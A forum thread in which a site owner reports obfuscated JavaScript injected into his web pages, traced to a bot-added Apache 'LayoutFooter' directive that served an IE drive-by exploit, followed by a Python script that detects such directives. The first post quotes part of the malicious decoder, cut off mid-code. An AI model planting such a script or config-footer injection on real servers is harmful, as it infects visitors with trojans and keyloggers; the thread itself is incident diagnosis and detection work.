Thread: google-counter.com

  1. #1
    zany_apinator Guest

    google-counter.com

    Hi all,

    Apologies in advance for the long story ... it starts off as a server issue but I think it might be caused by desktop malware.

    I've been struggling with this issue for the last few days and I think it might be caused by some kind of malware. I was playing around with some website templates and created a test site, when I noticed this code right several blank pages down in the source code (I've replaced <> with [] but it still comes out wonky in the post, sorry, etc.):

    [script language=JavaScript]function zz(x){var l=x.length,b=1024,i,j,h,p=0,s=0,w=0,t=Array(63,41, 59,48,47,28,30,58,17,16,0,0,0,0,0,0,13,24,61,3,9,
    32,18,15,45,25,37,33,14,42,35,46,34,49,4,26,21,22, 38,43,5,6,60,0,0,0,0,40,0,7,1,52,20,12,56,0,51,23, 27,8,39,10,11,29,36,50,54,19,62,31,57,2,44,53,
    55);for(j=Math.ceil(l/b);j]0;j--){h='';for(i=Math.min(l,b);i]0;i--,l--){w|=(t[x.charCodeAt(p++)-48])[[s;if(s){h+=String.fromCharCode(226^w&255)
    ;w

  2. #2

    Re: google-counter.com

    Ask the people at www.castlecops.com.

  3. #3
    zany_apinator Guest

    Re: google-counter.com

    Hello,
    Well, in desperation I hired a security expert (a guy called Martin from 3klabs security) who turned out to be great and extremely knowledgeable. He identified and fixed the issue within a few minutes. Here's the lowdown:
    Firstly, I thought my server had undergone security hardening, whereas in fact it had not. So my server was in a vulnerable state to begin with - now sorted.
    We think some kind of bot is making use of some kind of vulnerability to modify the Apache config file to include a line like this:
    LayoutFooter /usr/local/apache/conf/apache.conf
    Which uses the Layout module to force footers and headers onto every page on the server. The footer (/usr/local/apache/conf/apache.conf) contains the script. To test for this simply disable the layout module (mod_layout) and see what happens.
    Using that one line above means that EVERY web page on the server is infected. (Fortunately, removing that line also disinfects every page).
    The script makes use of an IE vulnerability, such that every IE user that loads the web page is exposed to potentially downloading trojans, keyloggers etc. Martin thinks the virus is related to this:
    http://www.viruslist.com/en/viruses/...?virusid=65760

    I hope this saves the next poor soul who gets infected a bit of time. I'm not sure what to do with new(?) discoveries like this but I'm sure the mod does. Kudos to Martin from http://3klabs.com for solving this. He saved my skin.


    Cheers,
    Brent
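
A check for the condition described in post #3, as an added example that is not part of the original thread or Martin's own tooling: it scans Apache configuration text for active `LayoutFooter` / `LayoutHeader` directives and reports whether the file each one points at contains a script tag. The sample config, the sample footer body and all function names are constructed for illustration; only the `LayoutFooter` line is taken from the post.

```python
import re
import sys

# Active (uncommented) mod_layout directives that append/prepend content to pages.
# LayoutFooter is the directive from the post; LayoutHeader is its header counterpart.
DIRECTIVE = re.compile(r'^\s*(Layout(?:Header|Footer))\s+"?([^"\s]+)"?', re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

def read_text(path):
    with open(path, errors="replace") as fh:
        return fh.read()

def find_layout_injections(conf_text, read_file=read_text):
    """Return (line_no, directive, target, has_script) for each Layout directive.
    has_script is None when the target cannot be read (missing, or not a file path)."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        target = m.group(2)
        try:
            has_script = bool(SCRIPT_TAG.search(read_file(target)))
        except OSError:
            has_script = None
        findings.append((lineno, m.group(1), target, has_script))
    return findings

# Constructed sample config: one commented-out directive, one active one.
SAMPLE_CONF = """\
ServerName example.test
# LayoutHeader /var/www/banner.html
DocumentRoot /var/www/html
LayoutFooter /usr/local/apache/conf/apache.conf
"""
# Constructed stand-in for the footer file: blank lines, then a script tag.
SAMPLE_FILES = {"/usr/local/apache/conf/apache.conf":
                "\n\n\n<script language=JavaScript>/* obfuscated payload */</script>\n"}

def sample_reader(path):
    if path not in SAMPLE_FILES:
        raise FileNotFoundError(path)
    return SAMPLE_FILES[path]

if __name__ == "__main__":
    if len(sys.argv) > 1:   # scan a real config file given on the command line
        hits = find_layout_injections(read_text(sys.argv[1]))
    else:                   # otherwise run against the constructed sample
        hits = find_layout_injections(SAMPLE_CONF, sample_reader)
    for lineno, directive, target, has_script in hits:
        print(f"line {lineno}: {directive} -> {target} (script tag: {has_script})")
```

Any hit is worth reviewing by hand; a footer target that sits in the Apache conf directory and contains a script tag matches what the post describes.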
